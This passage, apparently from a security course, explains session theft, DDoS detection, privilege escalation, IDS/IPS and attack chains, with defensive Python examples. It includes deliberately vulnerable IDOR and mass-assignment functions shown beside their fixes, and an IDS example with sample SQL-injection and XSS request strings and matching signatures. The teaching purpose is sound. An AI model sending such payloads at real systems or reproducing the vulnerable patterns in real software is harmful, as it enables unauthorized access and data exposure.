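        now = self.clock()
        if now - session["last_seen"] > self.idle_timeout:
            del self.sessions[sid]           # expired: a stolen token goes stale
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, sid: str) -> None:
        """Invalidate on the server. Only deleting the browser's cookie would
        leave a stolen copy working until it expires."""
        self.sessions.pop(sid, None)


if __name__ == "__main__":
    fake_now = [1_700_000_000.0]
    store = SessionStore(idle_timeout=900, clock=lambda: fake_now[0])
    victim_sid = store.create("alice")
    print(store.set_cookie_header(victim_sid))
    stolen = victim_sid                       # exfiltrated via XSS or sniffing
    print("attacker is treated as:", store.whoami(stolen))   # alice
    fake_now[0] += 1000
    print("after idle timeout:", store.whoami(stolen))       # None
```

Nothing in whoami() can distinguish the attacker from the victim, so the defences all live elsewhere: keeping the token out of reach (cookie flags, HTTPS), and limiting how long a stolen one stays valid (timeout, logout, re-issue at login).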

Advanced – Real World Security

Malware Types

Virus: Attaches to clean files and spreads.
Worm: Standalone malware that replicates itself to spread to other computers.
Trojan: Disguises itself as legitimate software.
Ransomware: Encrypts your files and demands payment to unlock them.

Botnets

The Concept: A network of private computers infected with malicious software and controlled as a group without the owners' knowledge.
Use: Often used to send spam or launch DDoS attacks.

DDoS

The Concept: A malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming the target with a flood of Internet traffic from multiple sources (Botnets).
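
How a flood looks in web server access logs, as an added Python example (not one of the lab's HTML simulations). The detector counts requests per source in ten-second windows: one source far above the limit is a single-source flood, while a window whose total is far above normal with no dominant source is the distributed pattern a botnet produces. The log lines (Common Log Format), the addresses and the thresholds are constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Added example (not one of the lab's simulations): flood detection over web
# server access logs (Common Log Format). Requests are counted per 10-second
# window; one source far above the limit is a single-source flood, while a
# window whose total is far above normal with no dominant source is the
# distributed pattern a botnet produces. The log lines are constructed.

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, _size = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "request": request, "status": int(status)}


def analyse(lines, window: int = 10, per_ip_limit: int = 50, total_limit: int = 200):
    """Return findings as (window_start_epoch, kind, detail)."""
    per_window = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        start = int(rec["time"].timestamp()) // window * window
        per_window[start][rec["ip"]] += 1

    findings = []
    for start, sources in sorted(per_window.items()):
        total = sum(sources.values())
        noisy = sorted(ip for ip, n in sources.items() if n > per_ip_limit)
        if noisy:
            findings.append((start, "single-source flood", noisy))
        elif total > total_limit:
            # Many sources, none individually loud: a per-IP rate limit would
            # never fire, which is the point of spreading the attack over a botnet.
            findings.append((start, "distributed flood", len(sources)))
    return findings


def make_sample_log():
    """Constructed traffic: a few normal requests, then 300 requests from 300
    distinct sources in one window, then 80 requests from a single source."""
    line = '{ip} - - [10/Oct/2023:13:55:{sec:02d} +0000] "GET {path} HTTP/1.1" 200 512'
    lines = [line.format(ip="198.51.100.7", sec=i, path="/index.html") for i in range(5)]
    lines += [line.format(ip=f"10.0.{i // 256}.{i % 256}", sec=10 + i % 10, path="/")
              for i in range(300)]
    lines += [line.format(ip="203.0.113.9", sec=20 + i % 10, path="/login") for i in range(80)]
    return lines


if __name__ == "__main__":
    for finding in analyse(make_sample_log()):
        print(finding)
```

The distributed case is why DDoS mitigation cannot rely on blocking individual addresses: the signal is the aggregate rate and the number of distinct sources, and the response is usually upstream filtering or absorbing the load rather than a per-IP deny list.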

Zero-Day

The Concept: A vulnerability in software that is unknown to the vendor. This means there is no patch available yet.
The Name: The developers have had "zero days" to fix it.

Reverse Shells

The Concept: Standard connections are Client -> Server. In a reverse shell, the target machine (victim) is forced to initiate a connection back to the attacker.
Why? It often bypasses firewalls: most firewalls block unsolicited incoming connections but allow outgoing ones, so once the victim connects out, the attacker sends commands back down that same established connection. This is why egress filtering and alerting on unusual outbound connections matter as much as blocking inbound ones.

Privilege Escalation

The Concept: Exploiting a bug or configuration oversight to gain elevated access to resources.
Vertical: Going from a normal User to an Admin (or from an ordinary process to root/SYSTEM).
Horizontal: Accessing another user's account or data at the same privilege level (e.g., changing the id in a URL to view someone else's invoice).
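
Both directions inside a web application, as an added Python example (not one of the lab's HTML simulations): a horizontal escalation through a missing ownership check (an insecure direct object reference) and a vertical one through a profile update that writes every submitted field, role included. The users, invoices and function names are constructed, and each flaw is shown beside the version with the check restored.

```python
# Added example (not one of the lab's simulations): both directions of privilege
# escalation in an application, each with the missing check restored. The users
# and invoices are constructed.

USERS = {
    "alice": {"role": "user"},
    "bob": {"role": "user"},
    "carol": {"role": "admin"},
}
INVOICES = {
    101: {"owner": "alice", "total": 40},
    102: {"owner": "bob", "total": 99},
}


def get_invoice_vulnerable(actor: str, invoice_id: int):
    """Horizontal: the caller is authenticated, but ownership is never checked,
    so alice reads bob's invoice by changing the id in the URL (an IDOR)."""
    return INVOICES.get(invoice_id)


def get_invoice_safe(actor: str, invoice_id: int):
    """Object-level authorization: the caller must own the record or be an admin."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return None
    if invoice["owner"] != actor and USERS[actor]["role"] != "admin":
        raise PermissionError(f"{actor} may not read invoice {invoice_id}")
    return invoice


def update_profile_vulnerable(actor: str, fields: dict) -> None:
    """Vertical: every submitted field is written through ("mass assignment"),
    so a user who adds role=admin to the form promotes themselves."""
    USERS[actor].update(fields)


def update_profile_safe(actor: str, fields: dict) -> None:
    """Allow-list the fields a user may change; role is only set by admin code paths."""
    allowed = {"display_name", "email"}
    rejected = set(fields) - allowed
    if rejected:
        raise PermissionError(f"fields not permitted: {sorted(rejected)}")
    USERS[actor].update(fields)


if __name__ == "__main__":
    print("alice reads bob's invoice:", get_invoice_vulnerable("alice", 102))
    try:
        get_invoice_safe("alice", 102)
    except PermissionError as exc:
        print("blocked:", exc)
    update_profile_vulnerable("alice", {"display_name": "A", "role": "admin"})
    print("alice is now:", USERS["alice"]["role"])
    try:
        update_profile_safe("bob", {"display_name": "B", "role": "admin"})
    except PermissionError as exc:
        print("blocked:", exc)
```

Both fixes follow the same rule from the Authentication vs Authorization section: knowing who the caller is settles nothing about what they may touch, so every object access and every writable field needs its own check.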

Network Sniffing

The Concept: Using software/hardware (like Wireshark or tcpdump) to capture and analyze data packets flowing through a network. Only traffic that reaches your network interface can be captured (on a switched network that normally means your own, unless you control the switch or poison ARP), and encrypted traffic such as HTTPS or SSH reveals addresses, sizes and timing but not contents.

IDS / IPS

IDS (Intrusion Detection System):
Action: Watch & Alert. Like a burglar alarm: it tells you something happened, but it does not stop it.
Position: Usually sits "out of band", fed a copy of the traffic (from a mirror port or network tap), so it can never block or slow anything down.
IPS (Intrusion Prevention System):
Action: Watch & Stop. Like a guard dog that bites.
Position: Sits "in-line", so all traffic flows through it and matching packets can be dropped. The cost is that a false positive blocks legitimate traffic, and the device itself becomes a bottleneck and a single point of failure.
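
The same signature engine deployed both ways, as an added Python example (not one of the lab's HTML simulations). The signatures and the five sample request lines are constructed; ids() works on a copy of the traffic and can only alert, ips() sits in the path and drops what matches, and the last sample line is a legitimate forum post that trips the SQL-injection signature, showing what a false positive costs in each position.

```python
import re

# Added example (not one of the lab's simulations): the same signature engine
# deployed two ways. ids() works on a copy of the traffic and can only alert;
# ips() sits in the path and drops what matches, which also means a false
# positive drops legitimate traffic. Signatures and sample traffic are constructed.

SIGNATURES = [
    ("sqli-or-1=1", re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE)),
    ("xss-script-tag", re.compile(r"<script\b", re.IGNORECASE)),
    ("path-traversal", re.compile(r"\.\./\.\./")),
]

SAMPLE_TRAFFIC = [
    "GET /index.html HTTP/1.1",
    "POST /login user=admin' OR 1=1 --&pass=x",
    "GET /search?q=<script>alert(1)</script> HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
    "POST /forum body=Why does ' OR 1=1 break my login form?",   # legitimate question
]


def inspect(payload: str):
    """Names of every signature that matches the payload."""
    return [name for name, pattern in SIGNATURES if pattern.search(payload)]


def ids(packets):
    """Out of band: returns (alerts, delivered). Delivery is untouched."""
    alerts = [(i, sig) for i, packet in enumerate(packets) for sig in inspect(packet)]
    return alerts, list(packets)


def ips(packets):
    """In line: returns (alerts, delivered). Matching packets never reach the server."""
    alerts, delivered = [], []
    for i, packet in enumerate(packets):
        hits = inspect(packet)
        if hits:
            alerts.extend((i, sig) for sig in hits)
        else:
            delivered.append(packet)
    return alerts, delivered


if __name__ == "__main__":
    ids_alerts, ids_delivered = ids(SAMPLE_TRAFFIC)
    ips_alerts, ips_delivered = ips(SAMPLE_TRAFFIC)
    print("IDS alerts:", ids_alerts, "delivered:", len(ids_delivered))
    print("IPS alerts:", ips_alerts, "delivered:", len(ips_delivered))
    print("IPS dropped the forum post too:", SAMPLE_TRAFFIC[4] not in ips_delivered)
```

Same alerts in both modes; the difference is entirely in what happens to the traffic. That is why teams typically run new signatures in detect-only mode first and promote them to blocking only once the false-positive rate is known.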

VPN & Tor

VPN (Virtual Private Network): Creates an encrypted tunnel from your device to the VPN server. The local network (e.g., the coffee-shop Wi-Fi) sees only encrypted traffic to that server, and the destination sees the VPN server's IP address instead of yours. The VPN provider, however, now sees everything the local network would have seen, so a VPN moves your trust rather than removing it.
Tor (The Onion Router): Routes traffic through a circuit of volunteer relays (normally three), wrapping the data in one layer of encryption per relay like the layers of an onion. Each relay peels off only its own layer and learns just the previous and next hop, so no single relay knows both who you are and where you are going.

Real-World Attack Chain

Attacks rarely happen in isolation. They follow a chain (the stages below are the Cyber Kill Chain):
Reconnaissance: Gathering info (Sniffing, Phishing).
Weaponization: Creating the malware (Trojan).
Delivery: Sending it to the victim (Email).
Exploitation: Triggering the bug (Zero-day).
Installation: Installing the backdoor (Reverse Shell).
Command & Control (C2): Taking control remotely.
Actions on Objectives: Stealing data or Ransomware.
